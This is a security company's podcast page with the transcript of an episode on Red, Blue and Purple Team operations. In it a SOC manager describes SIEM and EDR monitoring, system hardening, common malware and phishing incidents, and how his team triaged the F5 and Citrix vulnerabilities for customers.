Cipher Podcast: Behind the Scenes of Blue Team Operations
This topic of this episode is Red vs. Blue Team operations. The team even touches on the new Purple Team concept. Cipher Director of Technology and SOC Manager Ricardo Encinosa explores Blue Teams, which are tasked with defending a company from cyber attacks. He talks about the different systems used to defend the digital assets of companies and their benefits. Ricardo covers how logs and data paint the picture of a company’s cybersecurity posture. Identifying and detecting cybersecurity incidents are the groundwork for defense. The guys also cover popular attack techniques and how Blue Teams perform incident response. Finally Ricardo covers what he looks for as he hires people to join the Cipher Blue Team.
For more information about Cipher’s Blue Team, visit our page on Managed Security Services. Blue Teams are the heart of Cipher’s 24×7 cybersecurity protection.
Visit the podcast page for all episodes or listen on the platforms below.
Podcast Episode Transcript
Pete: Welcome everyone, my name is Peter Hackett. I am the Global Program Director for Cipher. In today’s episode, we are going to discuss Blue Team Operations and what happens after during the initial moments following the detection of a cybersecurity incident. Also with me today is my colleague Scott Croskey, the Global Chief Information Security Officer for Cipher. We are pleased to have with us the Director of Technology and the SOC Manager for our North America operations, Ricardo Encinosa. Ricky comes to us today from Miami Florida.
Ricky, how are you today?
Ricky: Thank you for that introduction Pete, I am doing well, happy to be on here today.
Pete: Thanks Ricky. And before we begin, I want to highlight to our listeners that Cipher is pleased to have been listed for the month of July as being #50 on the Top 200 most popular podcasts by Chartable in the Brazil Tech Podcast category. We’ve hosted these podcasts for the past three months and look forward to continuing to climb the charts in not only Brazil, but in North America, EMEA and the rest of the world!
Pete: Ok, let’s set the stage for today’s conversation. If you’ve been in or associated with the world of Information Security, you’ve probably heard the terms Red Team and Blue Team before. Most recently, the term Purple Team has been added to this lexicon. Last week we spent time talking about some of our Red Team services as we spoke with Sergio Alves on some tips from a penetration tester. This week, we will focus on Blue Teams and what activities are associated with Blue Teaming. But first, let’s get an understanding of exactly what these terms mean. Scott, can you let our listeners know the difference between, Red, Blue and Purple teams?
Scott: Of course Pete. The Red Team and Blue Team terminology concept was first used in the United States Department of Defense, although the general concept has been used in history for decades. When it came to exercising and improving the United State military’s ability to fight an adversary, special focus was placed on training and testing specialized teams. Red Teams are those groups that are focused on emulating adversarial activities. To give you more concept, in the early 1970s, the United States Air Force began conducting exercises called Red Flag which are intended to offer realistic air-combat training for military pilots and flight crew members. During Red Flag, the Red Team Air Force uses aircraft, tactics and techniques of enemy nation states to test the capabilities of US Air Force pilots. The color Red was selected because in the 1970s, the primary adversary of the United States was Communism. Hence the color Red. The friendly forces of the United States were always denoted by the color Blue. Following the establishment of Red Flag, the United States Air Force saw a dramatic increase in Air Force pilot capabilities against our adversaries. In the 1990s, this same concept was adopted by the United States Department of Defense for Information Security operations. INFOSEC Red Teams were organized in order to emulate the tactics, techniques and procedures used by many hacking groups and subsequently test the security network defenses of the United States, hence the Blue Team.
Fast forward into the twenty first century, the private sector adopted the terminology to represent specialized skills and services offered by cybersecurity companies. As you indicated earlier Pete, last week we dove into some of our Red Team services to include offensive security, ethical hacking, penetration tests and application testing.
Blue Teams are those team members who focus on defending a computer network. Activities include operating defensive security tools, hardening computer network infrastructure, conducting incident response activities, threat hunting, digital forensics, and overall damage control. These are the primary services in Cipher’s Managed Security Service (MSS), Managed Detection & Response (MDR), and Cyber Intelligence Services (CIS). Ricky is our SOC Manager for North America and essentially leads delivery of Blue Team services for our North American customers. I know his schedule is rather busy and it’s great to have some of his time today to talk about all the great work he and his team does for our customers.
Before we get to Blue Team Operations, I just want to spend a moment talking about a newer term adopted by the cybersecurity industry, which is Purple Teams. As you can imagine, Purple is a combination of Red and Blue. Purple Teams are those groups that have blended background in offensive and defensive cybersecurity operations. Their goal is to work with Blue Teams to facilitate improvement in cyber incident detection, defenses, and sharpening the skills of both Blue and Red team members. Typically we see the utilization of Purple Teams for larger and more mature organizations. But when it comes to Red and Blue teams, this is the quick summary of what these terms mean.
Pete: Thanks Scott. Let’s turn now to diving into the Blue Team Operations. Ricky, as Director of Technology and the SOC Manager for North America, can you discuss some of your roles and responsibilities?
Ricky: Cipher, being a full Managed Security Service Provider has many service lines some of which my colleagues talked about here today. Most of my responsibilities revolve around helping our Security Operation Centeres deliver those services efficiently and effectively. To do that I work closely with our clients and become a trusted advisor to help them with anything that may come up during the service or day to day.
Pete: Thanks Ricky. And today we would like to dive into a few real-world examples and talk about how Cipher triages cyber investigations and ultimately communicate and work with our customers through incident escalation and reporting. I’m sure your team sees a wide array of cyber incidents as you lead the delivery of our MSS and MDR services for our customers. What are the typical tools that our team uses to deliver these services? And how exactly to they aid in the detection of cyber incidents?
Ricky: Pretty much everyone has some type of a SIEM solution to bring in logs and alerts from different IT and security devices. This provides visibility into the network, correlation, and alerting capability, and lets us query data for reporting, investigation, and audit purposes. Some of the logs sources include network devices and operating system logs, the output of vulnerability scans, and other security devices such as intrusion detection and prevention systems. We do like to get closer to the asset and an endpoint detection and response solution. Besides the detection and blocking capabilities, EDR solutions allow us to gather forensic data and actually mitigate threats on the assets themselves. Those are just a few examples, it really comes down to what tools we have at our disposal and the service we are providing.
Pete: I have heard that we work with our customers to help harden their computer networks. What exactly does this mean?
Ricky: Hardening in general is about understanding the business functions of an asset and creating a baseline to only allow those functions. It’s one thing to create a baseline it’s another to ensure its being followed. It depends what you are hardening but we recommend to use tools such as port scanners to makes sure only allowed ports are open, vulnerability scanners to installed software, and various pen testing tools to ensure that hardening guidelines are being followed.
Pete: What are the best ways an organization can invest time and effort to greatly improve their cybersecurity maturity?
Ricky: The first two elements of the NIST cybersecurity framework are Identify and Protect. Any solution that helps you understand your hardware or software asset inventory is the first place to start. Whether that means starting small and running discovery scans to find out what is out there or implementing a full fledge vulnerability and compliance management solution to identify and mitigate risk. Once you figure out what is out there you can begin to protect it. 2nd I always recommend getting closer to the user. Implementing an advanced endpoint detection and response solution gives you the most visibility to specific assets you want to protect and also gives you some control over them.
Pete: And what are some of the most common attack techniques your team observes?
Ricky: We deal with a lot of malware-based attacks caused by a user. What I mean by that is someone clicking on phishing emails, downloading malicious files from websites, or bringing infected files from home on a USB or downloaded through personal email. Clients spend a lot of time and money to contain, isolate, and remediate these types of incidents whether it be a simple potentially unwanted application all the way to ransomware traversing their network or breached credentials.
Pete: It seems that nearly every week, there is some major vulnerability identified in the news. I think we kicked off the year 2020 with a major Citrix NetScaler vulnerability your team had to triage. Just last week there was a major issue with F5 Load Balancers and yet another Citrix NetScaler vulnerability that affected some of our customers. How do you triage significant vulnerabilities and work with our customers to ensure they know that our detection activities are state of the art?
Ricky: As with any vulnerability the client wants to know how to detect it and how to mitigate it. They want to know if someone is trying to exploit them and if they have already been exploited. In the case of the F5 load balancers we used the clients SIEM and EDR solution to create content around the known indicators of compromise. This gave us the ability to detect not only network and endpoint communication from both perimeter and endpoint devices but also since we are getting the actual Operating System level logs we were able to create alerts to detect the commands and files that are associated with the actual exploitation of this vulnerability.
Pete: I’ve read that the initial minutes and hours following a cybersecurity incident are the most critical for an organization to prevent significant damage to a company’s brand and reputation. How do you work with customers to define incident reporting and escalation activities?
Ricky: Cipher is a trusted partner, we are just one part in a client’s entire incident response process. A good incident response process outlines the roles and responsibilities of each member. We work with the client to streamline these processes not only for us but their entire team to ensure they are effective, and that everyone knows their role throughout the entire process.
Pete: Scott and Ricky, thank you for your time; this has been very informative, and I look forward to our next Podcast. For anyone of our listeners who are interested in our services, to include Managed Security Services, Managed Detection & Response, and Cyber Intelligence Services, please reach out to us via our marketing department, which can be reached at [email protected].